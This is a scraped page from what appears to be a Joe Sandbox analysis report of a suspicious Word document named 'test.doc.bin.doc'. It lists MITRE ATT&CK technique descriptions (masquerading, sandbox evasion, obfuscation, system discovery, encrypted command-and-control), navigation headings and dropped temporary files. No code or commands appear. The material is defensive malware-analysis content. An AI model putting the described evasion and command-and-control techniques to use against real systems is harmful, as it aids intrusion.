Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report test.doc.bin.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2wokibzk.uly.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h25xcatz.za3.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qwzezzsf.cln.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yi3yy00a.bzl.ps1

C:\Users\user\AppData\Local\Temp\~DF0F225979A2B77DAC.TMP

C:\Users\user\AppData\Local\Temp\~DF578EB33868079391.TMP

C:\Users\user\AppData\Local\Temp\~DF5D73A8E0D92E105C.TMP

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\06NZJBV9HXX9KW7GH2YM.temp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

C:\Users\user\Desktop\test.doc.bin.doc (copy)

C:\Users\user\Desktop\~$st.doc.bin.doc

C:\Users\user\Desktop\~WRD0000.tmp

C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

Static File Info

General

File Icon

Static OLE Info

General

Windows Analysis Report
test.doc.bin.doc